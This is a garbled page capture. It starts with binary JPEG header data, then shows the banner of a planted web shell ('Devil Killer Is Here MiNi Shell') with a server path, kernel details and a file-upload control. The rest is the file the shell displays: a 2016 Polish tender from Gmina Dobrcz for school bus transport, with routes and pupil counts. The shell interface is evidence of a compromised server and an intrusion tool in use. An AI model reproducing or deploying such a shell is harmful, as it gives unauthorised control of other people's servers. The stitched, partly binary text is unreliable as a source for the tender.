JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161207/360793-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.obrcz.bip.net.pl' target='_blank'>http://www.obrcz.bip.net.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 360793 - 2016
              z dnia 2016-12-07 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Dobrcz: Dowóz uczniów do szkół podstawowych i gimnazjalnych na terenie gminy Dobrcz<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Dobrcz, krajowy numer identyfikacyjny
              53425600000, ul.
              ul. Długa 
              50,
              86022  
              Dobrcz, woj.
              kujawsko-pomorskie, państwo
              Polska, tel.
              523 648 010, e-mail
              przetargi@dobrcz.pl, faks
              523 648 032.
              <br />
              Adres strony internetowej (URL): www.dobrcz.bip.net.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.obrcz.bip.net.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />W formie pisemnej za pośrednictwem operatora pocztowego, kuriera lub osobiście.<br />
                Adres:
                <br />Gina Dobrcz ul. Dłga 50, 86-022 Dobrcz biuo podawcze INFORMACJA parter</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dowóz uczniów do szkół podstawowych i gimnazjalnych na terenie gminy Dobrcz<br /><b>Numer referencyjny: </b>RGK 271.9.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Przedmiotem zamówienia jest:  
a)	Dowóz dzieci do szkół  podstawowych i gimnazjalnych na terenie Gminy Dobrcz w roku szkolnym 2016/2017 oraz 2017/2018 od dnia 02.01.2017 r. tj. 16 m-cy z wyłączeniem dni wolnych od zajęć szkolnych w oparciu o zakupione bilety miesięczne- około 516 biletów w skali miesiąca, zgodnie 
z wykazem tras. Wykonawcy zobowiązani są podać jedną uśrednioną cenę biletu miesięcznego dwustronnego (dowóz i odwóz). Liczba dzieci jest prognozowaną i może ulec zmianie. Zmiana ilości dzieci w trakcie roku szkolnego nie będzie stanowić podstawy do wnoszenia roszczeń przez Wykonawcę co do ilości faktycznie zamówionych przez zamawiającego biletów w toku realizacji umowy. Zmiana liczby dowożonych uczniów nie wymaga aneksu do umowy. Bilety miesięczne wystawiane będą przez Wykonawcę na podstawie otrzymanych od Dyrektorów szkół podległych Gminie Dobrcz w formie imiennych list uczniów uprawnionych do dowozu. Wykonawca zobowiązany jest do wystawienia bezpłatnego biletu miesięcznego do przejazdu opiekunów dzieci wskazanych przez zamawiającego w celu zapewnienia opieki dzieci i uczniów podczas przewozu.
b)	Usługa świadczona będzie w formie regularnych przewozów pasażerskich na terenie gminy Dobrcz, według 4 linii oraz osobnych rozkładów jazdy, zgodnie z zasadami i obowiązkami wynikającymi                z ustawy z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2016 r., poz. 1907 oraz ustawę z dnia 16 grudnia 2010 r. o publicznym transporcie zbiorowym (t. j. Dz. U. z 2016 r., poz. 1867).
c) 	Zamawiający przekazuje do wykorzystania na czas świadczenia usługi polegającej na transporcie 	dzieci do szkół na terenie gminy Dobrcz 3 sprawne technicznie autobusy:
	1/ marki Cacciamali, model TEMAE4, pojemność silnika 5880 cm3 ,  rok produkcji 2008,  o ilości 	miejsc 	ogółem 41 w tym 38 siedzących i 3 stojących.
	2/ marki Man, model A15, pojemność silnika 11967 cm3, rok produkcji 1995,  o ilości miejsc ogółem 	92 w tym 45 siedzących i 47 stojących, 
	3/ marki Jelcz,  pojemność silnika 11100 cm3, rok produkcji 1987, o ilości miejsc siedzących 45.
d)	Paliwo, wynagrodzenie dla kierowców, koszty zakupu materiałów, utrzymania pojazdów         niezbędnych do transportu pasażerów niniejszego przetargu obciążają Wykonawcę.
e)  Wykonawca zobowiązuje się do zatrudnienia na pół etatu 4 kierowców, których zapewni Gmina na 	okres świadczenia usługi transportu dzieci do szkół na terenie gminy Dobrcz. Wysokość 	wynagrodzenia ww. osób nie może być niższa przez cały okres obowiązywania dowozu, niż 2271,71 	zł brutto/etat miesięcznie.
f)   Zamawiający zapewni opiekę podczas przewozu dzieci do szkół na terenie Gminy Dobrcz.
	
Usługa opisana w pkt. a) świadczona będzie wyłącznie w trakcie trwania roku szkolnego. 
Szczegółowe terminy rozpoczęcia oraz zakończenia dowozu uczniów do szkół określi Zamawiający 	
w porozumieniu z wybranym Wykonawcą.

	2. Zamawiający zastrzega sobie możliwość zmiany kolejności tras i godzin przywozów, które zostaną ustalone po opracowaniu planów lekcji oraz liczby osób przewożonych po uwzględnieniu rekrutacji do szkół, przedszkoli i punktów przedszkolnych. Zamawiający zastrzega sobie możliwość odpracowania dni nauki szkolnej w soboty. Wykonawca zostanie powiadomiony o wystąpieniu soboty pracującej nie później niż 5 dni przed daną sobotą.  

	3. Dzieci powinny być dowożone do każdej placówki, tj. szkoły podstawowej i gimnazjum. Osoby sprawujące opiekę nad uczniami w czasie dowozu zatrudniają dyrektorzy szkół.

     4. Zamawiający obliguje Wykonawcę do świadczenia usług na rzecz mieszkańców gminy na trasach                                             dowozu uczniów poprzez sprzedaż biletów, o ile nie utrudniać to będzie przewozu dzieci do szkoły. 


5. Zamawiający informuje, iż dowóz dzieci będzie odbywał się na następujących trasach:

	Trasa 1 Dzieci dowożone będą do Zespołu Szkół w Wudzynie przy ul. Zamkowej 12  oraz Zespołu Szkół  w Kotomierzu  przy ul. Koronowskiej 2, na następujących trasach:

a) 	Kotomierz- Wudzyn- Kotomierz 
Kotomierz szkoła- Stary Jasiniec- Aleksandrowiec- Karolewo I (szkoła)- Karolewo II. Skrzyżowanie- Wudzynek Stawowa 3- Wudzynek Długa- Zakole- Wudzynek, Główna 8- Wudzynek, Tartaczna- Wudzyn, Szkolna (szkoła)- Stronno, Szkoła- Kotomierz, Miodowa 7- Kotomierz, Lipowa 3- Kotomierz, Lipowa 11- Trzebień 52- Trzebień I. (krzyżówka k. świetlicy)- Trzebień Pałac- Trzebień 28-Trzebień 23-Trzebień 18-Trzebień 13- Kotomierz, Podgórna 8-Kotomierz (szkoła)
ok. 32  km, wyjazd ok. godz. 6.40, 

b) 	Kotomierz- Wudzyn- Kotomierz
Kotomierz szkoła- Stary Jasiniec- Aleksandrowiec- Karolewo I (szkoła)- Karolewo II. Skrzyżowanie- Wudzynek Stawowa 3- Wudzynek Długa- Zakole- Wudzynek, Główna 8- Wudzyn, Szkolna (szkoła)
ok. 13,5 km, wyjazd ok. godz. 8.25, 

c) 	Kotomierz- Wudzyn- Kotomierz
Kotomierz, szkoła-Kotomierz, Podgórna 8-Trzebień 13-Trzebień 18-Trzebień 23-Trzebień 28-Trzebień Pałac-Trzebień Skrzyżowanie-Trzebień 52 - Kotomierz, Lipowa 11 - Kotomierz, Lipowa 3  Kotomierz ,Miodowa 7 - Wudzynek, Główna 8-Wudzyn, Szkolna(szkoła) - Wudzynek, Tartaczna - Wudzynek, Główna 8-Wudzynek,Długa-Zakole - Wudzynek, Stawowa 3- Karolewo II, Skrzyżowanie- Karolewo I (szkoła)-Stronno, Koronowska 8 Stronno, Szkolna 14 (sklep)- Aleksandrowiec-Stary Jasiniec-  Stronno, Szkolna 14(sklep)-Kotomierz(szkoła)
      	ok. 28 km, wyjazd ok. godz.12.35 , 

d)   Kotomierz-Wudzyn-Kotomierz 
Kotomierz, szkoła-Kotomierz, Podgórna 8-Trzebień 13-Trzebień 18-Trzebień 23-Trzebień 28-Trzebień Pałac-Trzebień Skrzyżowanie-Trzebień 52 - Kotomierz, Lipowa 11 - Kotomierz, Lipowa 3 Kotomierz, Miodowa I/Koronowska- Kotomierz ,Miodowa 7 - Wudzynek, Główna 8-Wudzyn, Szkolna(szkoła) - Wudzynek, Tartaczna - Wudzynek, Główna 8-Wudzynek,Długa-Zakole - Wudzynek, Stawowa 3- Karolewo II, Skrzyżowanie- Karolewo I (szkoła)-Stronno, Koronowska 8 - Aleksandrowiec-Stary Jasiniec-Kotomierz(szkoła)
      	ok.28 km, wyjazd ok. godz.14.25,  nie kursuje w środy

e) 	Kotomierz-Wudzyn-Kotomierz 
Kotomierz, szkoła-Kotomierz, Podgórna 8-Trzebień 13-Trzebień 18-Trzebień 23-Trzebień 28-Trzebień Pałac-Trzebień Skrzyżowanie-Trzebień 52 - Kotomierz, Lipowa 11 - Kotomierz, Lipowa 3  Kotomierz ,Miodowa I/ Koronowska-Kotomierz, szkoła
      ok. 12 km, wyjazd ok. godz. 14.25,  kursuje tylko w środy

f)    Kotomierz-Wudzyn-Kotomierz 
Kotomierz, szkoła-Kotomierz, Podgórna 8-Trzebień 13-Trzebień 18-Trzebień 23-Trzebień 28-Trzebień Pałac-Trzebień Skrzyżowanie-Trzebień 52 - Kotomierz, Lipowa 11 - Kotomierz, Lipowa 3 Kotomierz, Miodowa I/Koronowska- Kotomierz ,Miodowa 7 - Wudzynek, Główna 8-Wudzyn, Szkolna (szkoła) - Wudzynek, Tartaczna - Wudzynek, Główna 8-Wudzynek,Długa-Zakole - Wudzynek, Stawowa 3- Karolewo II, Skrzyżowanie- Karolewo I (szkoła)-Stronno, Koronowska 8 - Aleksandrowiec-Stary Jasiniec-Stronno, Szkolna 14 (sklep)-Kotomierz (szkoła) 
      ok. 27 km,  wyjazd ok. godz. 15.05,  kursuje tylko w środy

g)    Karczemka-Karolewo-Kotomierz
       Karczemka-Stronno, Szkolna 7-Wudzyn, Długa 4- Wudzyn, Szkolna (szkoła)- Karolewo (szkoła)  Karolewo 3 (Koronowska/droga do Karolewa)- Kotomierz, Koronowska 35- Kotomierz, Miodowa I/ Koronowska (PGR)- Kotomierz, Długa 31- Kotomierz, Długa 13-Kotomierz, Długa 44- Kotomierz, Koronowska 2 (szkoła)- Sienno, Parkowa 1 Sienno, Koronowska 14A/Polna- Kotomierz, Koronowska 2 (szkoła)-Magdalenka 9-Pyszczyn 16- Pyszczyn/ Marcelewo- Kotomierz, Koronowska 2 (szkoła) 
      ok. 28 km,  wyjazd ok. godz. 6.55

h)    Karczemka-Karolewo-Kotomierz
       Kotomierz, Koronowska 2 (szkoła)-Sienno, Parkowa 1 Sienno, Polna (Koronowska 14A)-Kotomierz, Długa 44-Kotomierz II, Długa 52- Kotomierz II,  Długa 64- Kotomierz, Miodowa 1-Kotomierz,Koronowska-Karolewo 2-Karolewo (szkoła)-Stronno, Szkolna 14(sklep)-Karczemka 10-Pyszczyn 4 (stadnina)-Pyszczyn 16- Pyszczyn, Marcelewo-Magdalenka 7G
      ok. 20 km,  wyjazd ok. godz. 12.35

i)    Karczemka-Karolewo-Kotomierz
       Kotomierz, Koronowska 2 (szkoła)-Sienno, Parkowa 1 Sienno, Polna (Koronowska 14A)-Kotomierz, Długa 44-Kotomierz II, Długa 52- Kotomierz II,  Długa 64 -Kotomierz, Koronowska-Karolewo 2-Karolewo (szkoła)-Stronno, Szkolna 14(sklep)-Karczemka 10-Pyszczyn 4 (stadnina)-Pyszczyn 16- Pyszczyn, Marcelewo -Magdalenka 7G
      ok. 20 km,  wyjazd ok. godz. 14.25

	Trasa 2 Dzieci dowożone będą do Zespołu Szkół w Dobrczu przy ul. Długiej 33 , Zespołu Szkół  w Borównie przy ul. Szkolnej 13 , Szkoły Podstawowej w Kozielcu (Kozielec 24) oraz Szkoły Podstawowej w Strzelcach Górnych przy ul. Szkolnej 46, na następujących trasach:

a)    Dobrcz-Trzeciewiec-Dobrcz
Dobrcz, Szkolna (szkoła)- Borówno, Szkolna 2 (światła)- Borówno, Spacerowa-Kusowo, Bloki- Gądecz (ŚDS/skrzyżowanie)- Kusowo- Dobrcz, Szkolna (szkoła)- Gądecz 25- Strzelce Górne, Gądecka (Kościół)- Strzelce Dolne 26-Trzęsacz 29 (Dolny)- Trzęsacz przed podjazdem - Trzęsacz 25 (Vitroflora) -Dobrcz, Szkolna (szkoła)- Włóki 45 (Kościół)- Włóki 23 (świetlica)-Trzęsacz 25(Vitroflora)-Trzęsacz 15 (sołtys)-Kozielec 24 (szkoła)-Dobrcz, Szkolna (szkoła)
ok. 45 km, wyjazd ok. godz.6.35
b)   Dobrcz-Trzeciewiec-Dobrcz
Dobrcz, Szkolna(szkoła)-Stronno Szkoła-Wudzyn Szkoła-Dobrcz, Szkolna (szkoła)
	       Ok.31 km, wyjazd ok. godz. 12.10

c)  Dobrcz-Trzeciewiec-Dobrcz
Dobrcz, Szkolna(szkoła)  Sienno, Koronowska/Zacisze- Sienno, Krakowska 36-  Sienno,  Krakowska 5-Dobrcz,Wodna/Koronowska- Włóki 2 (światła)-Włóki 23 (świetlica)-Trzęsacz  25 (Vitroflora)- Trzęsacz 18-Strzelce Dolne 26- Strzelce Górne, Gądecka (Kościół)- Gądecz - Kusowo, Osiedlowa/Spacerowa- Borówno, Spacerowa- Borówno, Polna- Dobrcz, Szkolna  (szkoła)
Ok.22 km, wyjazd ok. godz. 13.50, kursuje tylko w piątki

d)  Dobrcz-Trzeciewiec-Dobrcz
Dobrcz, Szkolna (szkoła)-Sienno, Koronowska/Zacisze-Sienno, Krakowska 36- Sienno, Krakowska 5-Dobrcz, Wodna/Koronowska-Włóki 2 (światła)-Włóki 23 (świetlica)-Trzęsacz 25 (Vitroflora)- Kozielec 24 (szkoła)- Kozielec 2-Trzeciewiec,bloki- Suponin-Trzeciewiec 82 (RPS)- Trzeciewiec  (świetlica)-Trzęsacz 25 (Vitroflora)-Włóki świetlica- Włóki światła- Dobrcz, Wodna- Dobrcz, Szkolna (szkoła)
Ok.27 km, wyjazd ok. godz. 13.50, kursuje tylko od poniedziałku do czwartku
e)  Dobrcz-Trzeciewiec-Dobrcz
Dobrcz, Szkolna (szkoła)-Borówno, Polna-Borówno, Spacerowa-Borówno, Szkolna 2   (światła)-Kusowo, Bloki- Gądecz 25-Strzelce Górne, Gądecka (Kościół)-Trzęsacz 25 (Vitroflora)-Włóki 23 (świetlica)-Włóki 2 (światła)-Dobrcz, Wodna/Koronowska-Dobrcz, Szkolna (szkoła)-Borówno, Polna-Borówno, Spacerowa 10-Borówno,Szkolna-Kusowo,Spacerowa/Osiedlowa-Gądecz 25-Strzelce Górne, Gądecka (Kościół)- Strzelce Dolne 26-Trzęsacz 29, Chełmszczonka-Trzęsacz przed podjazdem-Trzęsacz 25 (Vitroflora)-Kozielec 24 (szkoła)-Kozielec  2-Trzeciewiec,bloki- Suponin-Trzeciewiec 82 (RPS)-Trzeciewiec (świetlica)-Trzęsacz 25 (Vitroflora)-Włóki świetlica-Włóki światła-Dobrcz, Wodna- Sienno, Koronowska/Zacisze-Sienno, Krakowska 36-Sienno,Krakowska 5 Dobrcz, Szkolna (szkoła)
Ok. 52 km, wyjazd ok. godz. 14.40, kursuje od poniedziałku do czwartku
f)  Dobrcz-Trzeciewiec-Dobrcz
Dobrcz, Szkolna(szkoła)-Borówno, Polna- Borówno, Spacerowa- Borówno, Szkolna    2 (światła)- Kusowo, Bloki-Gądecz (ŚDS/skrzyżowanie)-Strzelce Górne, Gądecka (Kościoły)-Strzelce Dolne 26- Trzęsacz 29 (Dolny)-Dobrcz, Szkolna (szkoła)
	     Ok. 17 km, wyjazd ok. godz.14.40, kursuje tylko w piątki

g) Dobrcz-Kozielec-Trzeciewiec-Dobrcz
Dobrcz, Szkolna (szkoła)-Sienno, Jesionowa- Sienno, Koronowska/Zacisze-    Sienno, Krakowska 36- Sienno, Krakowska 5- Trzeciewiec (sklep)-Dobrcz szkoła-Dobrcz, Szkolna (szkoła)-Trzeciewiec 19(stara mleczarnia)- Trzeciewiec (świetlica)-Trzeciewiec 82 (RSP)- Suponin-Trzeciewiec 100,bloki-Kozielec (szkoła)-Kozielec Trzęsacz II figurka-Włóki 23 (świetlica)-Włóki (CPN)-Dobrcz, Wodna/Koronowska-Dobrcz, Szkolna (szkoła)
Ok. 22 km, wyjazd ok. godz. 6.55
	h)  Dobrcz-Kozielec-Trzeciewiec-Dobrcz
	     Kozielec szkoła-Kozielec 2-Suponin-Trzeciewiec 82 (RSP)-Trzeciewiec (świetlica)
	     Ok.13 km, wyjazd ok. godz. 12.20
	I)  Dobrcz-Kozielec-Trzeciewiec-Dobrcz
Dobrcz, Szkolna (szkoła)-Sienno, Koronowska /Zacisze- Sienno, Krakowska 36-Sienno,Krakowska 5-Dobrcz,Wodna/Koronowska-Włóki (CPN)-Włóki 23 (świetlica)-Trzęsacz 18-Kozielec 2 (szkoła)-Kozielec 2-Trzeciewiec 100(bloki)-Suponin-Trzeciewiec 82 (RPS)-Trzeciewiec (świetlica)-Kozielec szkoła-Trzęsacz 25 (Vitroflora)-Włóki 23 (świetlica)-Włóki 45 (Kościół)-Dobrcz, Szkolna (szkoła)
Ok.26 km, wyjazd ok. godz. 12.45, kursuje tylko w piątki
j)  Dobrcz-Kozielec-Trzeciewiec-Dobrcz
Dobrcz, Szkolna (szkoła)-Sienno,Jesionowa-Sienno,Koronowska/Zacisze-Sienno,Krakowska 36-Sienno,Krakowska 5-Dobrcz,Wodna/Koronowska-Włóki (CPN)- Włóki 23 (świetlica)-Trzęsacz 18-Kozielec 24 (szkoła)-Kozielec 2-Suponin-Trzeciewiec 82 (RPS)-Trzeciewiec (świetlica)-Dobrcz, Szkolna (szkoła)
Ok. 22 km, wyjazd ok. godz. 14.40, kursuje tylko w piątki
	k) Dobrcz-Kozielec-Trzeciewiec-Dobrcz
Dobrcz, Szkolna (szkoła)-Sienno,Jesionowa-Sienno,Koronowska/Zacisze-Sienno,Krakowska 36-Sienno,Krakowska 5-Trzeciewiec 19 (stara mleczarnia)-Trzeciewiec świetlica-Trzeciewiec 82 (RPS)-Kozielec 2-Kozielec szkoła-Kozielec 2- Trzeciewiec blok-Suponin-Trzeciewiec 82 (RPS)-Trzeciewiec (świetlica)-Trzęsacz II figurka-Trzęsacz 25 (Vitroflora)-Włóki 23 (świetlica)-Włóki 45 (Kościół)-Dobrcz, Szkolna (szkoła)
Ok. 40 km, wyjazd ok. godz. 14.40, kursuje od poniedziałku do czwartku
	Łączna liczba dzieci dojeżdżających do Zespołu Szkół w Kotomierzu wynosi 186 osób.
	Łączna liczba dzieci dojeżdżających do Zespołu Szkół w Wudzynie wynosi 119 osób.
Łączna liczba dzieci dojeżdżających do Zespołu Szkół w Dobrczu wynosi 126 osoby.
Łączna liczba dzieci dojeżdżających do Zespołu Szkół w Borównie wynosi  9 osób.
Łączna  liczba dzieci dojeżdżających do Szkoły Podstawowej w Kozielcu wynosi  72 osób.
Łączna liczba dzieci dojeżdżających do Szkoły Podstawowej w Strzelcach Górnych wynosi  4 osoby.
Ogólna liczba dowożonych osób: 516


<br /><br /><b>II.5) Główny kod CPV: </b>60112000-6<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
